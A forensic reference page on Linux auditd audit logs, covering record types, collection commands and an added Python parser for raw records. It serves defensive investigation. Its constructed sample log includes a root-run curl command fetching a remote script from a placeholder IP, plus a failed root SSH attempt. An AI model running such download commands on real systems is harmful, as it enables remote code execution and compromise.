auditd Audit Logs (audit.log)

Linux, Authentication & Access, Disk Image, SIEM / Log Aggregator

Location

/var/log/audit/audit.log (or /var/log/audit/audit.log.*)

Description

Linux audit daemon (auditd) logs: kernel-generated audit events selected by the loaded audit rules, written as one or more records per event. Records include SYSCALL (the syscall, its result, pid/ppid and the uid/auid/euid of the caller) with its associated EXECVE (command execution with full arguments), CWD and PATH (files touched) records, user-space authentication and session events (USER_AUTH, USER_LOGIN, USER_START), and privilege changes. Records belonging to the same event share the msg=audit(timestamp:serial) key.

Forensic Value

auditd provides the most granular Linux visibility available, but only for what the loaded rules select; confirm coverage with auditctl -l (an execve rule such as -a always,exit -F arch=b64 -S execve must be present before any EXECVE record exists). With such a rule in place, EXECVE records capture every command executed with its full arguments even when shell history is cleared, disabled or bypassed, and the SYSCALL record of the same event ties the command to the login user (auid), the effective user and the parent process. SYSCALL events likewise record file opens, network connections and privilege changes at the kernel level. The on-host file can be truncated or deleted by root, so the trail is tamper-resistant only when events are also forwarded off-host, for example through the audisp syslog or remote plugin, so that a local wipe does not destroy the record. aureport and ausearch filter efficiently by event type, user and timeframe; ausearch -i resolves uids and decodes hex-encoded arguments, and ausearch -if / aureport -if read a collected copy instead of the live log set.

Tools Required

aureport, ausearch, grep, SIEM (Splunk, Elastic)

Collection Commands

tar

tar czf /forensics/output/audit_logs.tar.gz /var/log/audit/

aureport

aureport --summary > /forensics/output/audit_summary.txt

ausearch

ausearch -m EXECVE --start recent > /forensics/output/audit_execve.txt

ausearch

ausearch -m USER_AUTH,USER_LOGIN --start today > /forensics/output/audit_auth.txt
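When the collected audit_logs.tar.gz is examined on an analysis host that lacks ausearch, or to cross-check what ausearch -i reports, the raw records are simple enough to parse directly. The parser below is an added example, not code from the page or from the audit project. It assumes the default log_format = RAW record layout, groups records by their msg=audit(timestamp:serial) key, reconstructs each EXECVE command line with its SYSCALL/CWD context (decoding the uppercase hex auditd uses for arguments containing spaces or non-printable bytes, and joining the aN[0], aN[1] fragments used for very long arguments), and extracts USER_AUTH/USER_LOGIN outcomes including the acct and addr fields nested inside the PAM msg='...' value. The sample records are constructed for the example, not captured from a real host.

```python
"""Offline parser for raw auditd records (added example, not from the page).

Reconstructs each EXECVE command line with its SYSCALL/CWD context, decoding
the uppercase-hex arguments auditd emits for values containing spaces or
non-printable bytes, and extracts USER_AUTH/USER_LOGIN outcomes. Meant for a
collected copy of audit.log on an analysis host that lacks ausearch.
"""
import re
from collections import defaultdict

# Constructed sample records, not captured from a real host. The a2[0]/a2[1]
# fragments in the curl event are shown shortened; auditd only splits
# arguments that are thousands of bytes long.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1700000000.123:4567): arch=c000003e syscall=59 success=yes exit=0 a0=55d0c1a2b3c0 a1=55d0c1a2b4e0 a2=55d0c1a2b500 a3=0 items=2 ppid=1200 pid=1234 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="bash" exe="/usr/bin/bash" subj=unconfined key="exec"
type=EXECVE msg=audit(1700000000.123:4567): argc=3 a0="bash" a1="-c" a2=6563686F2068656C6C6F
type=CWD msg=audit(1700000000.123:4567): cwd="/tmp"
type=PROCTITLE msg=audit(1700000000.123:4567): proctitle=62617368002D63006563686F2068656C6C6F
type=SYSCALL msg=audit(1700000000.500:4570): arch=c000003e syscall=59 success=yes exit=0 a0=1 a1=2 a2=3 a3=0 items=2 ppid=1234 pid=1240 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="curl" exe="/usr/bin/curl" subj=unconfined key="exec"
type=EXECVE msg=audit(1700000000.500:4570): argc=3 a0="curl" a1="-fsSL" a2[0]="http://198.51.100.7/" a2[1]="x.sh"
type=CWD msg=audit(1700000000.500:4570): cwd="/tmp"
type=USER_AUTH msg=audit(1700000100.456:4580): pid=1300 uid=0 auid=4294967295 ses=4294967295 subj=unconfined msg='op=PAM:authentication grantors=? acct="root" exe="/usr/sbin/sshd" hostname=203.0.113.5 addr=203.0.113.5 terminal=ssh res=failed'
"""

RECORD_RE = re.compile(r"^type=(\S+) msg=audit\((\d+\.\d+):(\d+)\): ?(.*)$")
KV_RE = re.compile(r"""([\w\-]+(?:\[\d+\])?)=("[^"]*"|'[^']*'|\S+)""")
ARG_RE = re.compile(r"^a(\d+)(?:\[(\d+)\])?$")
HEX_RE = re.compile(r"^(?:[0-9A-F]{2})+$")
# Fields auditd quotes when printable and hex-encodes otherwise (argv too).
ENCODED_FIELDS = {"acct", "comm", "exe", "cwd", "name", "proctitle", "cmd"}


def decode_field(key, raw, rtype):
    """Strip quotes, or hex-decode the fields auditd escapes; leave the rest."""
    if raw[:1] in ('"', "'"):
        return raw[1:-1]
    is_argv = rtype == "EXECVE" and ARG_RE.match(key)  # not SYSCALL a0..a3
    if (key in ENCODED_FIELDS or is_argv) and HEX_RE.match(raw):
        return bytes.fromhex(raw).decode("utf-8", "replace").replace("\x00", " ")
    return raw


def parse_fields(body, rtype):
    fields = {}
    for key, raw in KV_RE.findall(body):
        fields[key] = decode_field(key, raw, rtype)
        if key == "msg" and raw.startswith("'"):  # nested PAM msg='k=v ...'
            fields.update(parse_fields(raw[1:-1], rtype))
    return fields


def parse_audit_log(text):
    """Group records by event serial: {serial: [(type, timestamp, fields)]}."""
    events = defaultdict(list)
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            rtype, ts, serial, body = m.groups()
            events[int(serial)].append((rtype, float(ts), parse_fields(body, rtype)))
    return events


def reconstruct_argv(execve):
    """Join a0..aN in order, concatenating aN[0], aN[1] fragments of long args."""
    frags = defaultdict(dict)
    for key, value in execve.items():
        m = ARG_RE.match(key)
        if m:
            frags[int(m.group(1))][int(m.group(2) or 0)] = value
    argc = int(execve.get("argc", len(frags)))
    return ["".join(frags[i][j] for j in sorted(frags[i])) for i in range(argc)]


def execve_events(text):
    """One dict per execve with who/where context from the sibling records."""
    out = []
    for serial, records in sorted(parse_audit_log(text).items()):
        by_type = {rtype: f for rtype, _, f in records}  # last PATH item wins
        if "EXECVE" in by_type:
            sc, cwd = by_type.get("SYSCALL", {}), by_type.get("CWD", {})
            out.append({"ts": records[0][1], "serial": serial, "auid": sc.get("auid"),
                        "uid": sc.get("uid"), "exe": sc.get("exe"), "key": sc.get("key"),
                        "cwd": cwd.get("cwd"), "argv": reconstruct_argv(by_type["EXECVE"])})
    return out


def auth_events(text):
    """USER_AUTH/USER_LOGIN outcomes: account, source address, result."""
    return [{"ts": ts, "type": rtype, "acct": f.get("acct"), "addr": f.get("addr"),
             "exe": f.get("exe"), "res": f.get("res")}
            for _, records in sorted(parse_audit_log(text).items())
            for rtype, ts, f in records if rtype in ("USER_AUTH", "USER_LOGIN")]


if __name__ == "__main__":
    for e in execve_events(SAMPLE_LOG):
        print(f"{e['ts']:.3f} auid={e['auid']} uid={e['uid']} cwd={e['cwd']} argv={e['argv']}")
    for a in auth_events(SAMPLE_LOG):
        print(f"{a['ts']:.3f} {a['type']} acct={a['acct']} addr={a['addr']} res={a['res']}")
```

Two points the sample is built to show: the bash -c argument is stored as 6563686F2068656C6C6F rather than "echo hello", so a grep for the command string over the raw file misses it, and the second execve runs as uid 0 while auid stays 1000, which is the login user to attribute it to. Run it over a real copy with execve_events(open("audit.log").read()); feed rotated audit.log.N files in the same way and merge on serial and timestamp.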

Collection Constraints

  • Paths and log sources vary by distribution, init system, logging stack, and installed packages. Validate the active distro and service set before treating absence as meaningful.
  • Coverage depends on the loaded rules, not on the daemon being present: an empty or sparse audit.log with auditd running usually means no rules (or no execve rule) were loaded, not that nothing happened. Capture auditctl -l and /etc/audit/rules.d/ alongside the logs.
  • ausearch --start recent covers only the last 10 minutes and --start today only since midnight. For a full timeline collect the whole directory including the rotated audit.log.N files, and query the copy with ausearch -if <file> rather than the live log.
  • Values containing spaces, quotes or non-printable bytes (EXECVE arguments, proctitle, acct, file names) are stored hex-encoded in the raw file; grep over the raw log misses them unless run over ausearch -i output.
  • Centralized log copies may normalize, truncate, or drop fields relative to the original on-host artifact. Preserve the local source when scope and access permit.

MITRE ATT&CK Techniques

T1059.004, T1078, T1068, T1548.001